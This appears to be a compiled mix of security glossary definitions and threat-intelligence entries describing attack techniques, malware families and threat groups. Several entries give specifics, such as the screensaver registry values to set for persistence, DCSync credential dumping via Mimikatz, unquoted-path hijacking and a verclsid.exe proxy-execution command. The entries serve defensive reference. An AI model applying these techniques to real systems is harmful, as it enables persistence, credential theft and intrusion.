Definition: Software that performs packet sniffing and network traffic analysis to identify suspicious activity and record relevant information.

Name: Path Interception by Unquoted Path
Type: attack-pattern
Description: Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.

Service paths and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., <code>C:\unsafe path with space\program.exe</code> vs. <code>"C:\safe path with space\program.exe"</code>). (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is <code>C:\program files\myapp.exe</code>, an adversary may create a program at <code>C:\program.exe</code> that will be run instead of the intended program. 

This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.

Name: BOOSTWRITE
Type: malware
Description: BOOSTWRITE is a loader crafted to be launched via abuse of the DLL search order of applications used by FIN7.

Term: Probability Distribution
Definition: The assignment of a probability to the possible outcomes (realizations) of a random variable.

Term: qualification
Definition: Process of demonstrating whether an entity is capable of fulfilling specified requirements.

Term: <em>X2</em>
Definition: The [theoretical] chi-square distribution; used as a test statistic; also, a test statistic that follows the X2 distribution.

Term: FAL
Definition: A category describing the assertion protocol used by the federation to communicate authentication and attribute information (if applicable) to a relying party.

Term: extensible configuration checklist description format (XCCDF)
Definition: SCAP language for specifying checklists and reporting checklist results.

Name: BPFDoor
Type: malware
Description: BPFDoor is a Linux based passive long-term backdoor used by China-based threat actors. First seen in 2021, BPFDoor is named after its usage of Berkley Packet Filter (BPF) to execute single task instructions. BPFDoor supports multiple protocols for communicating with a C2 including TCP, UDP, and ICMP and can start local or reverse shells that bypass firewalls using iptables.

Term: SCAP data stream collection
Definition: A container for SCAP data streams and components.

Term: hash value/result
Definition: The result of applying a hash function to a message. Also known as a "hash value."

Term: block
Definition: In this Recommendation, a binary string, for example, a plaintext or a ciphertext, is segmented with a given length. Each segment is called a block. Data is processed block by block, from left to right.

Term: plaintext
Definition: Intelligible data that has meaning and can be understood without the application of decryption.

Name: Non-Application Layer Protocol
Type: attack-pattern
Description: Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).

ICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts. However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.

In ESXi environments, adversaries may leverage the Virtual Machine Communication Interface (VMCI) for communication between guest virtual machines and the ESXi host. This traffic is similar to client-server communications on traditional network sockets but is localized to the physical machine running the ESXi host, meaning it does not traverse external networks (routers, switches). This results in communications that are invisible to external monitoring and standard networking tools like tcpdump, netstat, nmap, and Wireshark. By adding a VMCI backdoor to a compromised ESXi host, adversaries may persistently regain access from any guest VM to the compromised ESXi host’s backdoor, regardless of network segmentation or firewall rules in place.

Term: information system security officer
Definition: Person responsible to the designated approving authority for ensuring the security of an information system throughout its lifecycle, from design through disposal.

Term: <em>|x|</em>
Definition: The length of a bit string <i>X&nbsp;</i>in bits.

Term: non-organizational user
Definition: A user who is not an organizational user (including public users).

Term: Message
Definition: The basic unit of data sent from one Web services agent to another in the context of Web services.

Term: protecting application
Definition: An application that controls access to protected resources.

Term: IS
Definition: A discrete set of information resources organized for the collection, processing, maintenance, use, sharing, dissemination, or disposition of information.
Note: Information systems also include specialized systems such as industrial/process controls systems, telephone switching and private branch exchange (PBX) systems, and environmental control systems.

Name: More_eggs
Type: malware
Description: More_eggs is a JScript backdoor used by Cobalt Group and FIN6. Its name was given based on the variable "More_eggs" being present in its code. There are at least two different versions of the backdoor being used, version 2.0 and version 4.4.

Term: Key-Encapsulation Mechanism
Definition: A set of three cryptographic algorithms (KeyGen, Encaps, and Decaps) that can be used by two parties to establish a shared secret key over a public channel.

Name: JCry
Type: malware
Description: JCry is ransomware written in Go. It was identified as apart of the #OpJerusalem 2019 campaign.

Term: <em>S</em>
Definition: The desired security strength for a digital signature.

Term: linkable information
Definition: Information about or related to an individual for which there is a possibility of logical association with other information about the individual.

Term: Wi-Fi
Definition: a generic term that refers to a wireless local area network that observes the IEEE 802.11 protocol.

Term: consumer IoT product
Definition: IoT products that are intended for personal, family, or household use.

Term: Certificate Transparency
Definition: A framework for publicly logging the existence of Transport Layer Security (TLS) certificates as they are issued or observed in a manner that allows anyone to audit CA activity and notice the issuance of suspect certificates as well as to audit the certificate logs themselves. (Experimental RFC 6962)

Name: VOID MANTICORE
Type: intrusion-set
Description: VOID MANTICORE is a threat group assessed to operate on behalf of Iran’s Ministry of Intelligence and Security (MOIS). Active since at least mid-2022, VOID MANTICORE has targeted government entities, critical infrastructure, and private sector organizations across Albania, Israel, and the United States. VOID MANTICORE conducts destructive cyber operations, combining wiper attacks with hack-and-leak campaigns. The group has operated under multiple public-facing personas, including HomeLand Justice in operations against Albania, Karma and Karma Below in campaigns targeting Israeli organizations, and Handala Hack, its current primary persona, which has claimed activity against Israeli and U.S. entities, including a March 2026 attack against Stryker Corporation. VOID MANTICORE has been observed collaborating with Scarred Manticore, which has been linked to initial access operations preceding VOID MANTICORE’s activity.

Term: zeroization
Definition: A method of erasing electronically stored data, cryptographic keys, and critical stored parameters by altering or deleting the contents of the data storage to prevent recovery of the data.

Term: Security Information and Event Management
Definition: A program that provides centralized logging capabilities for a variety of log types.

Term: applicant
Definition: A subject undergoing the processes of enrollment and identity proofing.

Name: MirrorStealer
Type: malware
Description: MirrorStealer is a credential stealer that has been used by MirrorFace since at least 2022 to steal credentials from various applications, including browsers and email clients. MirrorStealer has been delivered directly into system memory via commands issued by LODEINFO.

Term: Data Segment (Segment)
Definition: In the CFB mode, a sequence of bits whose length is a parameter that does not exceed the block size.

Term: Period of protection
Definition: The period of time during which the integrity or confidentiality of a key needs to be maintained.

Term: Management stations
Definition: Systems with which only IT and network administrators interact

Term: key pair
Definition: A set of two keys with the property that one key can be made public while the other key must be kept private. In this standard, this could refer to either the (encapsulation key, decapsulation key) key pair of a KEM or the (encryption key, decryption key) key pair of a PKE.

Term: Provider
Definition: The entity (person or organization) that provides an appropriate agent, referred to as the “provider agent” to implement a particular Web service. It will use the provider agent to exchange messages with the requester’s requester agent. “Provider” is also used as a shorthand to refer to the provider agent acting on the provider’s behalf.

Name: Databases
Type: attack-pattern
Description: Adversaries may leverage databases to mine valuable information. These databases may be hosted on-premises or in the cloud (both in platform-as-a-service and software-as-a-service environments). 

Examples of databases from which information may be collected include MySQL, PostgreSQL, MongoDB, Amazon Relational Database Service, Azure SQL Database, Google Firebase, and Snowflake. Databases may include a variety of information of interest to adversaries, such as usernames, hashed passwords, personally identifiable information, and financial data. Data collected from databases may be used for Lateral Movement, Command and Control, or Exfiltration. Data exfiltrated from databases may also be used to extort victims or may be sold for profit.

Term: ATA
Definition: Magnetic media interface specification. Also known as “IDE” –IntegratedDrive Electronics.

Name: DCSync
Type: attack-pattern
Description: Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API) to simulate the replication process from a remote domain controller using a technique called DCSync.

Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in Pass the Ticket or change an account's password as noted in Account Manipulation.

DCSync functionality has been included in the "lsadump" module in Mimikatz. Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.

Name: adbupd
Type: malware
Description: adbupd is a backdoor used by PLATINUM that is similar to Dipsind.

Term: firmware
Definition: Computer programs and data stored in hardware - typically in read-only memory (ROM) or programmable read-only memory (PROM) - such that the programs and data cannot be dynamically written or modified during execution of the programs.

Term: SoR
Definition: A system of records is a group of records under the control of a Federal agency which contains a personal identifier (such as a name, date of birth, finger print, Social Security Number, and Employee Number) and one other item of personal data (such as home address, performance rating, and blood type) from which information is retrieved using a personal identifier.

Term: Work Role
Definition: A grouping of work for which someone is responsible or accountable. Not synonymous with a job title or occupation, though they may coincide, depending on the organization. For example, the work role of “software developer” may apply to those with varying job titles, such as software engineers, coders, and application developers. Conversely, multiple roles could be combined to create a particular job. This additive approach supports improved modularity and illustrates the fact that all learners in the workforce perform numerous tasks in various roles, regardless of their job titles.

Name: BADCALL
Type: malware
Description: BADCALL is a Trojan malware variant used by the group Lazarus Group.

Term: Security Capability
Definition: See capability.

Term: Trust Management
Definition: An ISCM capability that ensures that untrustworthy persons are prevented from being trusted with network access (to prevent insider attacks).

Term: Core Baseline
Definition: A set of technical device capabilities needed to support common cybersecurity controls that protect the customer’s devices and device data, systems, and ecosystems.

Term: malware
Definition: A virus, worm, Trojan horse, or other code-based malicious entity that successfully infects a host.

Term: security categorization
Definition: The process of determining the security category for information or an information system. Security categorization methodologies are described in CNSS Instruction 1253 for national security systems and in FIPS PUB 199 for other than national security systems. See security category.

Name: Serverless
Type: attack-pattern
Description: Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them. 

Once compromised, the serverless runtime environment can be leveraged to either respond directly to infected machines or to Proxy traffic to an adversary-owned command and control server. As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to Hide Infrastructure.

Term: baseline configuration
Definition: A documented set of specifications for a system or a configuration item within a system that has been formally reviewed and agreed on at a given point in time and which can only be changed through change control procedures.

Term: digital signature
Definition: The result of a cryptographic transformation of data which, when properly implemented, provides the services of: 1. origin authentication, 2. data integrity, and 3. signer non-repudiation.

Name: StrifeWater
Type: malware
Description: StrifeWater is a remote-access tool that has been used by Moses Staff in the initial stages of their attacks since at least November 2021.

Term: chain of trust
Definition: A method for maintaining valid trust boundaries by applying a principle of transitive trust, where each software module in a system boot process is required to measure the next module before transitioning control.

Term: assertion
Definition: A statement from an IdP to an RP that contains information about an authentication event for a subscriber. Assertions can also contain identity attributes for the subscriber in the form of attribute values, derived attribute values, and attribute bundles.

Term: misconfiguration
Definition: An incorrect or subobtimal configuration of an information system or system component that may lead to vulnerabilities.

Term: Key-derivation method
Definition: A method used to derive keying material from initial shared secrets and possibly other information.

Term: key-establishment key pair
Definition: A public key and its corresponding private key; a key pair is used with a public-key (asymmetric-key) algorithm.

Name: PoetRAT
Type: malware
Description: PoetRAT is a remote access trojan (RAT) that was first identified in April 2020. PoetRAT has been used in multiple campaigns against the private and public sectors in Azerbaijan, including ICS and SCADA systems in the energy sector. The STIBNITE activity group has been observed using the malware. PoetRAT derived its name from references in the code to poet William Shakespeare.

Name: Password Filter DLL
Type: attack-pattern
Description: Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. 

Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. 

Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.

Name: njRAT
Type: malware
Description: njRAT is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.

Term: facility
Definition: One or more CKMS devices contained within a physically protected enclosure that is portable (e.g., a mobile phone or a laptop computer). The user of the mobile facility may be required to guard and protect the contents of the facility itself.

Term: Log Entry
Definition: An individual record within a log.

Name: Screensaver
Type: attack-pattern
Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension. The Windows screensaver application scrnsave.scr is located in <code>C:\Windows\System32\</code>, and <code>C:\Windows\sysWOW64\</code> on 64-bit Windows systems, along with screensavers included with base Windows installations.

The following screensaver settings are stored in the Registry (<code>HKCU\Control Panel\Desktop\</code>) and could be manipulated to achieve persistence:

* <code>SCRNSAVE.exe</code> - set to malicious PE path
* <code>ScreenSaveActive</code> - set to '1' to enable the screensaver
* <code>ScreenSaverIsSecure</code> - set to '0' to not require a password to unlock
* <code>ScreenSaveTimeout</code> - sets user inactivity timeout before screensaver is executed

Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.

Name: LockBit 3.0
Type: malware
Description: LockBit 3.0 is an evolution of the LockBit Ransomware-as-a-Service (RaaS) offering with similarities to BlackMatter and BlackCat ransomware. LockBit 3.0 has been in use since at least June 2022 and features enhanced defense evasion and exfiltration tactics, robust encryption methods for Windows and VMware ESXi systems, and a more refined RaaS structure over its predecessors such as LockBit 2.0.

Term: <em>h</em>
Definition: The length of the PRF output in bits.

Term: access control
Definition: Enable authorized use of a resource while preventing unauthorized use or use in an unauthorized manner.

Term: Consuming Application
Definition: An application that uses the output from an approved random bit generator.

Term: assessor
Definition: The individual, group, or organization responsible for conducting a privacy control assessment.

Term: Assurance of validity
Definition: Confidence that either a key or a key pair is arithmetically correct.

Term: Network Interface
Definition: An interface that connects an IoT device to a network (e.g., Ethernet, Wi-Fi, Bluetooth, Long-Term Evolution [LTE], Zigbee, Ultra-Wideband [UWB]).

Term: Assessment Completeness
Definition: The degree to which the continuous monitoring-generated, security-related information is collected on all assessment objects for all applicable defect checks within a defined period of time.

Term: <strong>cloud provider or provider</strong>
Definition: an organization that provides cloud services.

Term: AI
Definition: (1) Any artificial system that performs tasks under varying and unpredictable circumstances without significant human oversight, or that can learn from experience and improve performance when exposed to data sets. (2) An artificial system developed in computer software, physical hardware, or other context that solves tasks requiring human-like perception, cognition, planning, learning, communication, or physical action. (3) An artificial system designed to think or act like a human, including cognitive architectures and neural networks. (4) A set of techniques, including machine learning, that is designed to approximate a cognitive task. (5) An artificial system designed to act rationally, including an intelligent software agent or embodied robot that achieves goals using perception, planning, reasoning, learning, communicating, decision making, and acting.

Term: results
Definition: All data acquired from using a questionnaire, such as the answers to individual questions and the final result for the entire questionnaire.

Term: Supplier’s Declaration of Conformity
Definition: Declaration where the conformity assessment activity is performed by the person or organization that provides the ‘object’ (such as product, process, management system, person or body) and the supplier provides written confidence of conformity.

Term: incident handling
Definition: See incident handling.

Term: quality and integrity
Definition: A privacy principle (FIPP) that limits an organization's data processing activities to those that meet standards of accuracy, relevance, timeliness, and completeness that are reasonably necessary to ensure fairness to the individual.

Term: smart card
Definition: A credit card-sized card with embedded integrated circuits that can store, process, and communicate information.

Term: on behalf of (an agency)
Definition: A situation that occurs when: (i) a non-executive branch entity uses or operates an information system or maintains or collects information for the purpose of processing, storing, or transmitting Federal information; and (ii) those activities are not incidental to providing a service or product to the government.

Term: privacy plan
Definition: Formal document that provides an overview of the privacy requirements for an information system or program and describes the privacy controls in place or planned for meeting those requirements. The privacy plan may be integrated into the organizational security plan or developed as a separate plan.

Name: ThiefQuest
Type: malware
Description: ThiefQuest is a virus, data stealer, and wiper that presents itself as ransomware targeting macOS systems. ThiefQuest was first seen in 2020 distributed via trojanized pirated versions of popular macOS software on Russian forums sharing torrent links. Even though ThiefQuest presents itself as ransomware, since the dynamically generated encryption key is never sent to the attacker it may be more appropriately thought of as a form of wiper malware.

Term: card
Definition: An integrated circuit card.

Term: Host operating system
Definition: The operating system kernel shared by multiple applications within an application virtualization architecture.

Name: Quick Assist
Type: tool
Description: Quick Assist is a remote assistance tool primarily for Microsoft Windows, although a macOS version also exists. Quick Assist allows for remote screen sharing and, with end user approval, remote control and command execution on the enabling device.

Term: key pair
Definition: A private key and its corresponding public key; a key pair is used with an asymmetric-key (public-key) algorithm.

Name: Milan
Type: malware
Description: Milan is a backdoor implant based on DanBot that was written in Visual C++ and .NET. Milan has been used by HEXANE since at least June 2020.

Term: expectation over transformation
Definition: A method for strengthening adversarial examples to re­main adversarial under image transformations that occur in the real world, such as angle and viewpoint changes. EOT models these perturbations within the opti­mization procedure. Rather than optimizing the log-likelihood of a single example, EOT uses a chosen distribution of transformation functions that take an input con­trolled by the adversary to the “true” input perceived by the classifier.

Name: RogueRobin
Type: malware
Description: RogueRobin is a payload used by DarkHydrus that has been developed in PowerShell and C#.

Term: training data extraction
Definition: The ability of an attacker to extract the training data of a genera­tive model by prompting the model with specific inputs.

Term: block cipher
Definition: A family of permutations of blocks that is parameterized by the key.

Term: CIA
Definition: C = Confidentiality assurance, I = Integrity assurance, A = Availability assurance

Term: defense-in-depth
Definition: The application of multiple countermeasures in a layered or stepwise manner to achieve security objectives. The methodology involves layering heterogeneous security technologies in the common attack vectors to ensure that attacks missed by one technology are caught by another.

Term: <em>ei</em>
Definition: The ith bit in the original sequencee.

Term: Short Message Service Chat
Definition: a facility for exchanging messages between mobile phone users in real-time via SMS text messaging, which allows previous messages from the same conversation to be viewed.

Term: key agreement
Definition: A (pair-wise) key-establishment procedure in which the resultant secret keying material is a function of information contributed by both participants, so that neither party can predetermine the value of the secret keying material independently from the contributions of the other party. Contrast with key transport.

Term: ACME
Definition: A protocol defined in IETF RFC 8555 that provides for the automated enrollment of certificates.

Term: subject
Definition: Generally an individual, process, or device causing information to flow among objects or change to the system state. See object.

Term: privilege certificate manager (PCM)
Definition: The key management entity (KME) authorized to create the privilege certificate for another KME.

Term: CUI
Definition: A categorical designation that refers to unclassified information that does not meet the standards for National Security Classification under Executive Order 12958, as amended, but is (i) pertinent to the national interests of the United States or to the important interests of entities outside the federal government, and (ii) under law or policy requires protection from unauthorized disclosure, special handling safeguards, or prescribed limits on exchange or dissemination. Henceforth, the designation CUI replaces Sensitive But Unclassified (SBU).

Term: Relationship Explanation
Definition: A text description of the nature of the relationship between a Reference Document Element and a Focal Document Element within a supportive relationship mapping.

Term: <em>L</em>
Definition: The number of levels of trees in HSS.

Term: device information declaration
Definition: A trusted digital assertion with information about the IoT device, such as the identity or certificate of the device owner and possibly the identities or certificates of any other entities that the device owner has authorized to onboard the device on its behalf.

Term: vehicle
Definition: Space operational items that include the launching items used to place the satellite, bus, and/or payload into orbit.

Name: WIREFIRE
Type: malware
Description: WIREFIRE is a web shell written in Python that exists as trojanized logic to the visits.py component of Ivanti Connect Secure VPN appliances. WIREFIRE was used during Cutting Edge for downloading files and command execution.

Term: architecture
Definition: Fundamental concepts or properties related to a system in its environment embodied in its elements, relationships, and in the principles of its design and evolution.

Term: Body
Definition: The section of an email message that contains the actual content of the message.

Term: Key-derivation procedure
Definition: A multi-step process that uses an approved Message Authentication Code (MAC) algorithm to derive keying material from a shared secret and other information.

Name: Operation Dust Storm
Type: campaign
Description: Operation Dust Storm was a long-standing persistent cyber espionage campaign that targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. By 2015, the Operation Dust Storm threat actors shifted from government and defense-related intelligence targets to Japanese companies or Japanese subdivisions of larger foreign organizations supporting Japan's critical infrastructure, including electricity generation, oil and natural gas, finance, transportation, and construction.

Operation Dust Storm threat actors also began to use Android backdoors in their operations by 2015, with all identified victims at the time residing in Japan or South Korea.

Term: Integrated Digital Enhanced Network (iDEN)
Definition: a proprietary mobile communications technology developed by Motorola that combine the capabilities of a digital cellular telephone with two-way radio.

Term: Key Performance Indicator
Definition: A metric of progress toward intended results.

Term: HMAC_DRBG
Definition: A DRBG specified in SP 800-90A based on HMAC.

Term: Owner
Definition: An OLIR produced by the owner of the Reference Document.

Term: Discovery
Definition: The act of locating a machine-processable description of a Web service-related resource that may have been previously unknown and that meets certain functional criteria. It involves matching a set of functional and other criteria with a set of resource descriptions. The goal is to find an appropriate Web service-related resource.

Term: <em>gxy</em>
Definition: Diffie-Hellman (DH) key exchange value, also called a DH shared secret (in IKE version 1).

Name: Dark Caracal
Type: intrusion-set
Description: Dark Caracal is threat group that has been attributed to the Lebanese General Directorate of General Security (GDGS) and has operated since at least 2012.

Term: chief information security officer
Definition: See Senior Agency Information Security Officer.

Term: message digest
Definition: the fixed size result of hashing a message.

Term: service level agreement (SLA)
Definition: Defines the specific responsibilities of the service provider and sets the customer expectations.

Term: <em>P*n</em>
Definition: The last block of the plaintext, which may be a partial block.

Term: message digest
Definition: See Hash digest.

Name: Software
Type: attack-pattern
Description: Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning (ex: listening ports, server banners, user agent strings) or Phishing for Information. Adversaries may also compromise sites then include malicious content designed to collect host information from visitors. Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Additionally, adversaries may analyze metadata from victim-owned files (e.g., PDFs, DOCs, images, and sound files hosted on victim-owned websites) to extract information about the software and hardware used to create or process those files. Metadata may reveal software versions, configurations, or timestamps that indicate outdated or vulnerable software. This information can be cross-referenced with known CVEs to identify potential vectors for exploitation in future operations.

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or for initial access (ex: Supply Chain Compromise or External Remote Services).

Term: customer
Definition: Organization or person that receives a product.

Term: short-term stability
Definition: The stability of a time or frequency signal over a short measurement interval, usually an interval of 100 seconds or less in duration.

Term: Bit Stream Imaging
Definition: A bit-for-bit copy of the original media, including free space and slack space.
Also known as disk imaging.

Term: secret key
Definition: A single cryptographic key that is used with a symmetric-key algorithm; also called a secret key. A symmetric-key algorithm is a cryptographic algorithm that uses the same secret key for an operation and its complement (e.g., encryption and decryption).

Term: mobile code technologies
Definition: Software technologies that provide the mechanisms for the production and use of mobile code (e.g., Java, JavaScript, ActiveX, VBScript).

Term: Hardware Asset Management
Definition: An ISCM capability that identifies unmanaged devices that are likely to be used by attackers as a platform from which to extend compromise of the network to be mitigated.

Term: approved
Definition: FIPS-approved and/or NIST-recommended. An algorithm or technique that is either 1) specified in a FIPS or NIST Recommendation, 2) adopted in a FIPS or NIST Recommendation or 3) specified in a list of NIST-approved security functions.

Term: Second preimage resistance
Definition: An expected property of a hash function whereby it is computationally infeasible to find a second preimage of a known message digest, See “Second preimage”.

Term: agreement
Definition: Mutual acknowledgement of terms and conditions under which a working relationship is conducted.

Name: MSBuild
Type: attack-pattern
Description: Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.

Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.

Term: Server
Definition: A computer or device on a network that manages network resources. Examples are file servers (to store files), print servers (to manage one or more printers), network servers (to manage network traffic), and database servers (to process database queries).

Name: User Training
Type: course-of-action
Description: User Training involves educating employees and contractors on recognizing, reporting, and preventing cyber threats that rely on human interaction, such as phishing, social engineering, and other manipulative techniques. Comprehensive training programs create a human firewall by empowering users to be an active component of the organization's cybersecurity defenses. This mitigation can be implemented through the following measures:

Create Comprehensive Training Programs:

- Design training modules tailored to the organization's risk profile, covering topics such as phishing, password management, and incident reporting.
- Provide role-specific training for high-risk employees, such as helpdesk staff or executives.

Use Simulated Exercises:

- Conduct phishing simulations to measure user susceptibility and provide targeted follow-up training.
- Run social engineering drills to evaluate employee responses and reinforce protocols.

Leverage Gamification and Engagement:

- Introduce interactive learning methods such as quizzes, gamified challenges, and rewards for successful detection and reporting of threats.

Incorporate Security Policies into Onboarding:

- Include cybersecurity training as part of the onboarding process for new employees.
- Provide easy-to-understand materials outlining acceptable use policies and reporting procedures.

Regular Refresher Courses:

- Update training materials to include emerging threats and techniques used by adversaries.
- Ensure all employees complete periodic refresher courses to stay informed.

Emphasize Real-World Scenarios:

- Use case studies of recent attacks to demonstrate the consequences of successful phishing or social engineering.
- Discuss how specific employee actions can prevent or mitigate such attacks.

Term: control assessor
Definition: See assessor.

Term: TA
Definition: A public or symmetric key that is trusted because it is directly built into hardware or software, or securely provisioned via out-of-band means, rather than because it is vouched for by another trusted entity (e.g. in a public key certificate).

Name: Mosquito
Type: malware
Description: Mosquito is a Win32 backdoor that has been used by Turla. Mosquito is made up of three parts: the installer, the launcher, and the backdoor. The main backdoor is called CommanderDLL and is launched by the loader program.

Term: risk governance
Definition: The process by which risk management evaluation, decisions, and actions are connected to enterprise strategy and objectives. Risk governance provides the transparency, responsibility, and accountability that enables managers to acceptably manage risk.

Term: Archive
Definition: 1. To place information into long-term storage. 2. A locat ion or media ussed for long-term storage.

Term: Actor
Definition: See threat actor.

Term: countermeasures
Definition: Actions, devices, procedures, techniques, or other measures that reduce the vulnerability of an information system.

Name: Pteranodon
Type: malware
Description: Pteranodon is a custom backdoor used by Gamaredon Group.

Term: Central Oversight Authority
Definition: The cryptographic key management system (CKMS) entity that provides overall CKMS data synchronization and system security oversight for an organization or set of organizations.

Term: Input Block
Definition: A data block that is an input to either the forward cipher function or the inverse cipher function of the block cipher algorithm.

Term: DEA
Definition: The Data Encryption Algorithm specified in FIPS 46-3

Term: <em><strong>X • Y</strong></em>
Definition: The product of two blocks, X and Y, regarded as elements of a certain binary Galois field.

Term: risk executive (function)
Definition: An individual or group within an organization that helps to ensure that provides a comprehensive, organization-wide approach to risk management. The risk executive (function) serves as the common risk management resource for senior leaders, executives, and managers, mission/business owners, chief information officers, senior agency information security officers, senior agency officials for privacy, system owners, common control providers, enterprise architects, security architects, systems security or privacy engineers, system security or privacy officers, and any other stakeholders having a vested interest in the mission/business success of organizations. The risk executive (function) is an inherent U.S. Government function and is assigned to government personnel only. (SP800-37 Revision 2)

Name: Dacls
Type: malware
Description: Dacls is a multi-platform remote access tool used by Lazarus Group since at least December 2019.

Term: information system component
Definition: See information system component.

Term: Resource allocation
Definition: A mechanism for limiting how much of a host’s resources a given container can consume.

Term: Integrity protection
Definition: See Integrity authentication.

Term: system element
Definition: See system component.

Term: environment
Definition: Aggregate of external procedures, conditions, and objects affecting the development, operation, and maintenance of an information system.

Term: jitter
Definition: As it relates to queuing, the difference in latency of packets.

Term: senior information security officer (SISO)
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under FISMA and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers.
[Note: Organizations subordinate to federal agencies may use the term Senior Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.]

Term: assignment operation
Definition: A control parameter that allows an organization to assign a specific, organization-defined value to the control or control enhancement (e.g., assigning a list of roles to be notified or a value for the frequency of testing).

Term: CISO
Definition: See Senior Agency Information Security Officer.

Term: learning program plan
Definition: A formal document that provides an overview of an agency’s cybersecurity and privacy learning program, including a description of its structure, the resources dedicated to it, the roles of senior agency officials and staff, and the strategic goals and objectives of the learning program to meet applicable privacy requirements and manage privacy risks.

Term: assurance
Definition: Grounds for confidence that the other four security objectives (integrity, availability, confidentiality, and accountability) have been adequately met by a specific implementation. “Adequately met” includes (1) functionality that performs correctly, (2) sufficient protection against unintentional errors (by users or software), and (3) sufficient resistance to intentional penetration or by-pass.

Term: Test, Training, and Exercise (TT&E) Policy
Definition: A policy that outlines an organization’s internal and external requirements associated with training personnel, exercising IT plans, and testing IT components and systems.

Term: clear
Definition: A method of sanitization that applies logical techniques to sanitize data in all user-addressable storage locations for protection against simple non-invasive data recovery techniques; typically applied through the standard Read and Write commands to the storage device, such as by rewriting with a new value or using a menu option to reset the device to the factory state (where rewriting is not supported).

Term: Randomized hashing
Definition: A technique for randomizing the input to a cryptographic hash function.

Term: DSIG
Definition: The result of a cryptographic transformation of data that, when properly implemented, provides origin authentication, assurance of data integrity, and signatory non-repudiation.

Name: MURKYTOP
Type: malware
Description: MURKYTOP is a reconnaissance tool used by Leviathan.

Name: Verclsid
Type: attack-pattern
Description: Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.

Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running <code>verclsid.exe /S /C {CLSID}</code>, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to Regsvr32). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.

Term: subscriber
Definition: A Subscriber is an entity that (1) is the subject named or identified in a certificate issued to that entity, (2) holds a private key that corresponds to the public key listed in the certificate, and (3) does not itself issue certificates to another party. This includes, but is not limited to, an individual or network device

Term: Bytewise matching
Definition: relies only on the sequences of bytes that make up a digital object, without reference to any structures within the data stream, or to any meaning the byte stream may have when appropriately interpreted. Such methods have the widest applicability as they can be applied to any piece of data; however, they also carry the implicit assumption that artifacts that humans perceive as similar have similar byte-level encodings. This assumption is not universally valid. Analyst expertise is necessary to evaluate the significance of a byte-level match.

Term: sanitization
Definition: Actions taken to render data written on media unrecoverable by ordinary and — for some forms of sanitization — extraordinary means.

Term: critical software
Definition: Any software that has, or has direct software dependencies upon, one or more components with at least one of these attributes:
